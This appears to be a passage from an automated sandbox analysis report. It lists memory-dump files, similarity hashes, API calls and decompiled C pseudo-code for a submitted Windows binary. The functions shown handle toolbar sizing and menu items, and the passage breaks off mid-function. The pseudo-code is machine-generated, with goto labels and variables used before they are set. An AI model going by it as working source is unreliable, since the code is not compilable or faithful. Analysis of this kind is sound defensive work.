                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu_memset$Info$DefaultVersion
                                                                                                                                                                                                                                                                                          • String ID: ,$,$Z
                                                                                                                                                                                                                                                                                          • API String ID: 3121610409-2789403577
                                                                                                                                                                                                                                                                                          • Opcode ID: e584b7cc95e5f9fed2311bde4c8a41bad05827b357b342f5defdfa97ac7d1c5e
                                                                                                                                                                                                                                                                                          • Instruction ID: 71316f74ef96409ae8686e5be8be073ee592db490ad2a909b9a4ebe56efe8dba
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e584b7cc95e5f9fed2311bde4c8a41bad05827b357b342f5defdfa97ac7d1c5e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151E2719003189BEBA4CF14DC45BFAB7B4EF55701F0481AAEB89A66C0D7B09AC4DF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E000FD0D0(struct HWND__* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v76;
                                                                                                                                                                                                                                                                                          				int _v88;
                                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                                          				int _t53;
                                                                                                                                                                                                                                                                                          				int _t66;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t82;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t82 = __esi;
                                                                                                                                                                                                                                                                                          				_t43 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t43 ^ _t83;
                                                                                                                                                                                                                                                                                          				_t81 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_v28 = _a4;
                                                                                                                                                                                                                                                                                          				_t66 = SendMessageA(__esi, 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          				_v108 = 0x50;
                                                                                                                                                                                                                                                                                          				E00106820( &_v104, 0, 0x4c);
                                                                                                                                                                                                                                                                                          				_v104 = 0x371;
                                                                                                                                                                                                                                                                                          				_v100 = 4;
                                                                                                                                                                                                                                                                                          				if(_t66 > 0) {
                                                                                                                                                                                                                                                                                          					_v100 = 0x204;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_a8 != 0) {
                                                                                                                                                                                                                                                                                          					_v100 = _v100 | 0x00000001;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v88 = 0;
                                                                                                                                                                                                                                                                                          				_v76 = _t82;
                                                                                                                                                                                                                                                                                          				_v56 = SendMessageA(_v28, 0x40c, 0, 0) + 0xeb00;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                                          				if(_t66 <= 0) {
                                                                                                                                                                                                                                                                                          					GetWindowRect(_t82,  &_v24);
                                                                                                                                                                                                                                                                                          					_t53 = _v16 - _v24;
                                                                                                                                                                                                                                                                                          					_v64 = _t53;
                                                                                                                                                                                                                                                                                          					_v72 = 0;
                                                                                                                                                                                                                                                                                          					_v68 = _v12 - _v20;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x41d, _t66,  &_v24);
                                                                                                                                                                                                                                                                                          					_v64 = _v16;
                                                                                                                                                                                                                                                                                          					_v68 = _v12 - _v20;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x41d, 0,  &_v24);
                                                                                                                                                                                                                                                                                          					_t53 = _v64;
                                                                                                                                                                                                                                                                                          					_v72 = _v16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v40 = _t53;
                                                                                                                                                                                                                                                                                          				if(SendMessageA(_v28, 0x401, 0xffffffff,  &_v108) != 0) {
                                                                                                                                                                                                                                                                                          					SendMessageA(_t82, 0x454, 0, SendMessageA(_t82, 0x455, 0, 0) | 0x00000010);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t66, _v8 ^ _t83,  &_v108, _t81, _t82);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E001059E6(_t55, _t66, _v8 ^ _t83,  &_v108, _t81, _t82);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x000fd0d0
                                                                                                                                                                                                                                                                                          0x000fd0d6
                                                                                                                                                                                                                                                                                          0x000fd0dd
                                                                                                                                                                                                                                                                                          0x000fd0e5
                                                                                                                                                                                                                                                                                          0x000fd0f5
                                                                                                                                                                                                                                                                                          0x000fd102
                                                                                                                                                                                                                                                                                          0x000fd104
                                                                                                                                                                                                                                                                                          0x000fd10b
                                                                                                                                                                                                                                                                                          0x000fd113
                                                                                                                                                                                                                                                                                          0x000fd11a
                                                                                                                                                                                                                                                                                          0x000fd123
                                                                                                                                                                                                                                                                                          0x000fd125
                                                                                                                                                                                                                                                                                          0x000fd125
                                                                                                                                                                                                                                                                                          0x000fd130
                                                                                                                                                                                                                                                                                          0x000fd132
                                                                                                                                                                                                                                                                                          0x000fd132
                                                                                                                                                                                                                                                                                          0x000fd143
                                                                                                                                                                                                                                                                                          0x000fd14a
                                                                                                                                                                                                                                                                                          0x000fd154
                                                                                                                                                                                                                                                                                          0x000fd159
                                                                                                                                                                                                                                                                                          0x000fd15c
                                                                                                                                                                                                                                                                                          0x000fd15f
                                                                                                                                                                                                                                                                                          0x000fd162
                                                                                                                                                                                                                                                                                          0x000fd167
                                                                                                                                                                                                                                                                                          0x000fd1a4
                                                                                                                                                                                                                                                                                          0x000fd1ad
                                                                                                                                                                                                                                                                                          0x000fd1b6
                                                                                                                                                                                                                                                                                          0x000fd1b9
                                                                                                                                                                                                                                                                                          0x000fd1c0
                                                                                                                                                                                                                                                                                          0x000fd169
                                                                                                                                                                                                                                                                                          0x000fd175
                                                                                                                                                                                                                                                                                          0x000fd18c
                                                                                                                                                                                                                                                                                          0x000fd18f
                                                                                                                                                                                                                                                                                          0x000fd192
                                                                                                                                                                                                                                                                                          0x000fd197
                                                                                                                                                                                                                                                                                          0x000fd19a
                                                                                                                                                                                                                                                                                          0x000fd19a
                                                                                                                                                                                                                                                                                          0x000fd1c9
                                                                                                                                                                                                                                                                                          0x000fd1d9
                                                                                                                                                                                                                                                                                          0x000fd203
                                                                                                                                                                                                                                                                                          0x000fd219
                                                                                                                                                                                                                                                                                          0x000fd1dd
                                                                                                                                                                                                                                                                                          0x000fd1ea
                                                                                                                                                                                                                                                                                          0x000fd1ea

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000418,00000000,00000000), ref: 000FD0F8
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FD10B
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000040C,00000000,00000000), ref: 000FD14D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000041D,00000000,000F7DB7), ref: 000FD175
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000041D,00000000,000F7DB7), ref: 000FD192
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 000FD1A4
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,000000FF,00000050), ref: 000FD1D5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000455,00000000,00000000), ref: 000FD1F5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000454,00000000,00000000), ref: 000FD203
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$RectWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                          • API String ID: 1972968356-3110715001
                                                                                                                                                                                                                                                                                          • Opcode ID: f17ccc4c70b4cc62eee172da15984c7a66308763bffc8d7d7fbd9ae3d865e26b
                                                                                                                                                                                                                                                                                          • Instruction ID: 33a802ca47861551dfe4968b540be9204b705df345517e3c4767d0c116dcbab2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f17ccc4c70b4cc62eee172da15984c7a66308763bffc8d7d7fbd9ae3d865e26b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD411DB1E0030CAFEB10DFA8DD85BEEBBB9AF44704F10411AE604BB280D7B46A45CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E000FE542() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				int _t65;
                                                                                                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                                                                                                          				CHAR* _t69;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t76;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          				CHAR* _t80;
                                                                                                                                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                                                                                                                                          				intOrPtr _t94;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t96;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t98;
                                                                                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				int _t103;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t99 =  *(_t104 - 0x9c);
                                                                                                                                                                                                                                                                                          				_t96 =  *(_t104 - 0x90);
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					_t80 =  *(_t103 + 4);
                                                                                                                                                                                                                                                                                          					if(_t80 != 0 && _t98 > lstrlenA(_t104 - 0x84)) {
                                                                                                                                                                                                                                                                                          						lstrcpyA(_t80, _t104 - 0x84);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t93 = _t104 - 0xcc;
                                                                                                                                                                                                                                                                                          					 *(_t104 - 0xac) = _t103;
                                                                                                                                                                                                                                                                                          					SetMenuItemInfoA( *(_t104 - 0x8c),  *(_t104 - 0x88), 1, _t104 - 0xcc);
                                                                                                                                                                                                                                                                                          					_t76 =  *(_t104 - 0x8c);
                                                                                                                                                                                                                                                                                          					_t96 =  *(_t104 - 0x94);
                                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                                                                          							_t99 =  *(_t104 - 0x88) + 1;
                                                                                                                                                                                                                                                                                          							 *(_t104 - 0x88) = _t99;
                                                                                                                                                                                                                                                                                          							if(_t99 >= GetMenuItemCount(_t76)) {
                                                                                                                                                                                                                                                                                          								 *(_t104 - 0x90) = _t76;
                                                                                                                                                                                                                                                                                          								E00101C50(_t104 - 0x90, _t96 + 0x14);
                                                                                                                                                                                                                                                                                          								_t59 =  *((intOrPtr*)(_t104 - 0x98));
                                                                                                                                                                                                                                                                                          								 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
                                                                                                                                                                                                                                                                                          								_pop(_t97);
                                                                                                                                                                                                                                                                                          								_pop(_t101);
                                                                                                                                                                                                                                                                                          								_pop(_t78);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t104 - 0x18) ^ _t104;
                                                                                                                                                                                                                                                                                          								return E001059E6(_t59, _t78,  *(_t104 - 0x18) ^ _t104, _t93, _t97, _t101);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                                                                                                          							L2:
                                                                                                                                                                                                                                                                                          							E00106820(_t104 - 0xcc, 0, 0x30);
                                                                                                                                                                                                                                                                                          							_t106 = _t106 + 0xc;
                                                                                                                                                                                                                                                                                          							 *(_t104 - 0xcc) = 0x30;
                                                                                                                                                                                                                                                                                          							if(E000F4890(_t76, _t96, _t99) != 0) {
                                                                                                                                                                                                                                                                                          								 *(_t104 - 0xcc) = 0x2c;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t93 = _t104 - 0xcc;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t104 - 0xa4)) = 0x64;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t104 - 0xc8)) = 0x3f;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t104 - 0xa8)) = _t104 - 0x84;
                                                                                                                                                                                                                                                                                          							GetMenuItemInfoA(_t76, _t99, 1, _t104 - 0xcc);
                                                                                                                                                                                                                                                                                          							_t110 =  *(_t104 - 0xc4) & 0x00000100;
                                                                                                                                                                                                                                                                                          						} while (( *(_t104 - 0xc4) & 0x00000100) != 0);
                                                                                                                                                                                                                                                                                          						_push(0x14);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t104 - 0xc8)) = 0x31;
                                                                                                                                                                                                                                                                                          						 *(_t104 - 4) = 1;
                                                                                                                                                                                                                                                                                          						_t65 = E001065FC(_t93, _t96, _t99, _t110);
                                                                                                                                                                                                                                                                                          						_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                          						if(_t65 == 0) {
                                                                                                                                                                                                                                                                                          							_t103 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							 *(_t104 - 0x9c) = 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t65 = 0x1313;
                                                                                                                                                                                                                                                                                          							_t103 = _t65;
                                                                                                                                                                                                                                                                                          							 *(_t104 - 0x9c) = _t65;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t104 - 4) = 0;
                                                                                                                                                                                                                                                                                          					} while (_t103 == 0);
                                                                                                                                                                                                                                                                                          					 *(_t103 + 8) =  *(_t104 - 0xc4);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t103 + 0xc)) =  *((intOrPtr*)(_t104 - 0xc0));
                                                                                                                                                                                                                                                                                          					 *(_t104 - 0xc4) =  *(_t104 - 0xc4) | 0x00000100;
                                                                                                                                                                                                                                                                                          					 *(_t103 + 0x10) = 0xffffffff;
                                                                                                                                                                                                                                                                                          					_t94 =  *((intOrPtr*)(_t96 + 0x50));
                                                                                                                                                                                                                                                                                          					_t67 = 0;
                                                                                                                                                                                                                                                                                          					if(_t94 <= 0) {
                                                                                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                                                                                          						_t33 = lstrlenA(_t104 - 0x84) + 1; // 0x1
                                                                                                                                                                                                                                                                                          						_t98 = _t33;
                                                                                                                                                                                                                                                                                          						_push(_t98);
                                                                                                                                                                                                                                                                                          						 *(_t104 - 0x90) = _t98;
                                                                                                                                                                                                                                                                                          						 *(_t103 + 4) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t104 - 4) = 3;
                                                                                                                                                                                                                                                                                          						_t69 = E00105DD7(_t104 - 0x84, _t98, _t103, _t117);
                                                                                                                                                                                                                                                                                          						_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                          						 *(_t103 + 4) = _t69;
                                                                                                                                                                                                                                                                                          						 *(_t104 - 4) = 0;
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t81 =  *((intOrPtr*)(_t104 - 0xbc));
                                                                                                                                                                                                                                                                                          						while(_t67 >= 0 && _t67 < _t94) {
                                                                                                                                                                                                                                                                                          							if(( *( *((intOrPtr*)(_t96 + 0x4c)) + _t67 * 2) & 0x0000ffff) == _t81) {
                                                                                                                                                                                                                                                                                          								 *(_t103 + 0x10) = _t67;
                                                                                                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t67 = _t67 + 1;
                                                                                                                                                                                                                                                                                          								_t117 = _t67 - _t94;
                                                                                                                                                                                                                                                                                          								if(_t67 < _t94) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						 *(_t104 - 4) = 0;
                                                                                                                                                                                                                                                                                          						return E000FE542;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L26;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x000fe542
                                                                                                                                                                                                                                                                                          0x000fe548
                                                                                                                                                                                                                                                                                          0x000fe54e
                                                                                                                                                                                                                                                                                          0x000fe54e
                                                                                                                                                                                                                                                                                          0x000fe553
                                                                                                                                                                                                                                                                                          0x000fe56e
                                                                                                                                                                                                                                                                                          0x000fe56e
                                                                                                                                                                                                                                                                                          0x000fe580
                                                                                                                                                                                                                                                                                          0x000fe58b
                                                                                                                                                                                                                                                                                          0x000fe591
                                                                                                                                                                                                                                                                                          0x000fe597
                                                                                                                                                                                                                                                                                          0x000fe59d
                                                                                                                                                                                                                                                                                          0x000fe59d
                                                                                                                                                                                                                                                                                          0x000fe5a3
                                                                                                                                                                                                                                                                                          0x000fe5a3
                                                                                                                                                                                                                                                                                          0x000fe5a3
                                                                                                                                                                                                                                                                                          0x000fe5a9
                                                                                                                                                                                                                                                                                          0x000fe3ce
                                                                                                                                                                                                                                                                                          0x000fe3dc
                                                                                                                                                                                                                                                                                          0x000fe5af
                                                                                                                                                                                                                                                                                          0x000fe5be
                                                                                                                                                                                                                                                                                          0x000fe5c3
                                                                                                                                                                                                                                                                                          0x000fe5cc
                                                                                                                                                                                                                                                                                          0x000fe5d4
                                                                                                                                                                                                                                                                                          0x000fe5d5
                                                                                                                                                                                                                                                                                          0x000fe5d6
                                                                                                                                                                                                                                                                                          0x000fe5da
                                                                                                                                                                                                                                                                                          0x000fe5e4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe3e2
                                                                                                                                                                                                                                                                                          0x000fe3ed
                                                                                                                                                                                                                                                                                          0x000fe3f2
                                                                                                                                                                                                                                                                                          0x000fe3f5
                                                                                                                                                                                                                                                                                          0x000fe406
                                                                                                                                                                                                                                                                                          0x000fe408
                                                                                                                                                                                                                                                                                          0x000fe408
                                                                                                                                                                                                                                                                                          0x000fe412
                                                                                                                                                                                                                                                                                          0x000fe423
                                                                                                                                                                                                                                                                                          0x000fe42d
                                                                                                                                                                                                                                                                                          0x000fe437
                                                                                                                                                                                                                                                                                          0x000fe43d
                                                                                                                                                                                                                                                                                          0x000fe443
                                                                                                                                                                                                                                                                                          0x000fe443
                                                                                                                                                                                                                                                                                          0x000fe453
                                                                                                                                                                                                                                                                                          0x000fe455
                                                                                                                                                                                                                                                                                          0x000fe45f
                                                                                                                                                                                                                                                                                          0x000fe463
                                                                                                                                                                                                                                                                                          0x000fe468
                                                                                                                                                                                                                                                                                          0x000fe46d
                                                                                                                                                                                                                                                                                          0x000fe47f
                                                                                                                                                                                                                                                                                          0x000fe47f
                                                                                                                                                                                                                                                                                          0x000fe481
                                                                                                                                                                                                                                                                                          0x000fe46f
                                                                                                                                                                                                                                                                                          0x000fe46f
                                                                                                                                                                                                                                                                                          0x000fe475
                                                                                                                                                                                                                                                                                          0x000fe477
                                                                                                                                                                                                                                                                                          0x000fe477
                                                                                                                                                                                                                                                                                          0x000fe487
                                                                                                                                                                                                                                                                                          0x000fe48e
                                                                                                                                                                                                                                                                                          0x000fe49c
                                                                                                                                                                                                                                                                                          0x000fe4a5
                                                                                                                                                                                                                                                                                          0x000fe4a8
                                                                                                                                                                                                                                                                                          0x000fe4b2
                                                                                                                                                                                                                                                                                          0x000fe4b9
                                                                                                                                                                                                                                                                                          0x000fe4bc
                                                                                                                                                                                                                                                                                          0x000fe4c0
                                                                                                                                                                                                                                                                                          0x000fe4e2
                                                                                                                                                                                                                                                                                          0x000fe4ef
                                                                                                                                                                                                                                                                                          0x000fe4ef
                                                                                                                                                                                                                                                                                          0x000fe4f4
                                                                                                                                                                                                                                                                                          0x000fe4f5
                                                                                                                                                                                                                                                                                          0x000fe4fb
                                                                                                                                                                                                                                                                                          0x000fe4fe
                                                                                                                                                                                                                                                                                          0x000fe502
                                                                                                                                                                                                                                                                                          0x000fe507
                                                                                                                                                                                                                                                                                          0x000fe50a
                                                                                                                                                                                                                                                                                          0x000fe50d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4c2
                                                                                                                                                                                                                                                                                          0x000fe4c2
                                                                                                                                                                                                                                                                                          0x000fe4c8
                                                                                                                                                                                                                                                                                          0x000fe4db
                                                                                                                                                                                                                                                                                          0x000fe51f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4dd
                                                                                                                                                                                                                                                                                          0x000fe4dd
                                                                                                                                                                                                                                                                                          0x000fe4de
                                                                                                                                                                                                                                                                                          0x000fe4e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4db
                                                                                                                                                                                                                                                                                          0x000fe52f
                                                                                                                                                                                                                                                                                          0x000fe535
                                                                                                                                                                                                                                                                                          0x000fe541
                                                                                                                                                                                                                                                                                          0x000fe541
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe4c0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Infolstrlen$Count_memsetlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: ,$1$d
                                                                                                                                                                                                                                                                                          • API String ID: 4062197468-1943914033
                                                                                                                                                                                                                                                                                          • Opcode ID: 62945a7389cafeea5fc35d0334a3f7117d9e2db6886ec4b2b625f0730203ab7b
                                                                                                                                                                                                                                                                                          • Instruction ID: e151cf847067d8a4f1b101565f6c91a26760aec53e995431d58101ddd9675fb9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62945a7389cafeea5fc35d0334a3f7117d9e2db6886ec4b2b625f0730203ab7b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4414B70D01669DFEB24CF20CD84BA9B7B5BF44704F1081D8E649A7691EBB4AE84DF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000FE95B(void* __esi) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                          				CHAR* _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				char _t65;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t68;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          				signed short _t70;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t72 = __esi;
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					_t68 =  *(_t74 - 0x15c);
                                                                                                                                                                                                                                                                                          					E00106820(_t74 - 0x190, 0, 0x30);
